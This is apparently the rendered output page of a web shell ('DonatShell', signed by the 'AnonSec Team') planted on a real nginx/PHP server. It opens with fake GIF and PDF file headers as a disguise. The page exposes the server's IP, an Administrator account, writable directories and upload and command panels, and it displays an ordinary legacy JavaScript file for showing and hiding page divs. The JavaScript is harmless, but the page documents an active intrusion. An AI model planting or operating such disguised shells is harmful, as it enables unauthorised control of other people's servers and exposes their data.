GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/common/js.cloak/Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/common/js.cloak/Archive/div.js
// divHideShow.js

if (!window.debugOn) { debugOn=false; }
if (!window.debugOn_divHideShow) { debugOn_divHideShow = 0; }
//debugOn_divHideShow = 1;

// divContent(divId,divContent)
// Change the content of the div.
function divContent(divId,divContent) { 
	if (debugOn || debugOn_divContent) alert('divContent('+divId+','+divContent+')');
	if (document.getElementById &&!document.all) { 
		eId = document.getElementById(divId); 
		eId.innerHTML = divContent;
	} else if (document.all) { // IE 4 or 5 (or 6 beta)
		eval( "document.all." + divId + ".innerHTML = divContent"); 
	} else if (document.layers) { // NETSCAPE 4 or below 
		document.layers[divId].innerHTML = divContent;
	} else {
		document.getElementById(divId).innerHTML = divContent;
	}
} 
// divHide(divId)
// Hide the div.
function divHide(divId) { 
	if (debugOn || debugOn_divHideShow) alert('divHide('+divId+')');
	//alert('divHide('+divId+')');
	/*
	if (document.getElementById &&!document.all) { 
		eId = document.getElementById(divId); 
		eId.style.display = 'none';
		eId.style.visibility = 'hidden';
	} else if (document.all) { // IE 4 or 5 (or 6 beta)
		eval( "document.all." + divId + ".style.display = 'none'"); 
		eval( "document.all." + divId + ".style.visibility = 'hidden'"); 
	} else if (document.layers) { // NETSCAPE 4 or below 
		document.layers[divId].display = 'none';
		document.layers[divId].style.visibility = 'hidden';
	} else {
		document.getElementById(divId).style.display = 'none';
		document.getElementById(divId).style.visibility = 'hidden';
	}
	*/
	if (document.getElementById && !document.all) { 
		//alert('eId = document.getElementById(divId);');
		eId = document.getElementById(divId); 
	} else if (document.all) { // IE 4 or 5 (or 6 beta)
		//alert('eId = document.all[divId];');
		eId = document.all[divId]; 
	} else if (document.layers) { // NETSCAPE 4 or below 
		//alert('eId = document.layers[divId];');
		eId = document.layers[divId];
	} else {
		//alert('eId = document.getElementById(divId);');
		eId = document.getElementById(divId);
	}
	//alert(eId);
	if (eId != null) {
		eId.style.display = 'none';
		eId.style.visibility = 'hidden';
	}
	//eIdStyle = eId.style;
	//alert('exit divHide('+divId+')');
} 
// divHideShow(divId,state)
// Toggle the div display.
function divHideShow(divId,state) {
	if (debugOn || debugOn_divHideShow) alert('divHideShow: divId='+divId+' state='+state);
	if (arguments.length == 1) {
		if(document.getElementById(divId).style.display == 'none') {
			divShow(divId);
		} else {
			divHide(divId);
		} 
	} else {
		if (state) {
			divShow(divId);
		} else {
			divHide(divId);
		}
	}
}
// function divSetContent(divId,newContent)
// Replaces the current divId content with newContent.
function divSetContent(divId,newContent){
	if (debugOn) alert('divSetContent('+divId+","+newContent+")");
	eId = document.getElementById(divId);
	eId.innerHTML = newContent;
}
// divShow(divId)
// Show the div.
function divShow(divId) { 
	if (debugOn || debugOn_divHideShow) alert('divShow('+divId+')');
	/*
	if (document.getElementById &&!document.all) { 
		eId = document.getElementById(divId); 
		eId.style.display = 'block';
		eId.style.visibility = 'visible';
	} else if (document.all) { // IE 4 or 5 (or 6 beta)
		eval( "document.all." + divId + ".style.display = 'block'"); 
		eval( "document.all." + divId + ".style.visibility = 'visible'"); 
	} else if (document.layers) { // NETSCAPE 4 or below 
		document.layers[divId].display = 'block';
		document.layers[divId].style.visibility = 'visible';
	} else {
		document.getElementById(divId).style.display = 'block';
		document.getElementById(divId).style.visibility = 'visible';
	}
	*/
	if (document.getElementById && !document.all) { 
		eId = document.getElementById(divId); 
	} else if (document.all) { // IE 4 or 5 (or 6 beta)
		eId = document.all[divId]; 
	} else if (document.layers) { // NETSCAPE 4 or below 
		eId = document.layers[divId];
	} else {
		eId = document.getElementById(divId);
	}
	//eIdStyle = eId.style;
	eId.style.display = 'block';
	eId.style.visibility = 'visible';
}
// divShowInline(divId)
// Show the div as inline.
function divShowInline(divId) { 
	if (debugOn || debugOn_divHideShow) alert('divShowInline('+divId+')');
	if (document.getElementById &&!document.all) { 
		eId = document.getElementById(divId); 
		eId.style.display = 'inline';
		eId.style.visibility = 'visible';
	} else if (document.all) { // IE 4 or 5 (or 6 beta)
		eval( "document.all." + divId + ".style.display = 'inline'"); 
		eval( "document.all." + divId + ".style.visibility = 'visible'"); 
	} else if (document.layers) { // NETSCAPE 4 or below 
		document.layers[divId].display = 'inline';
		document.layers[divId].style.visibility = 'visible';
	} else {
		document.getElementById(divId).style.display = 'inline';
		document.getElementById(divId).style.visibility = 'visible';
	}
}

Anon7 - 2022
AnonSec Team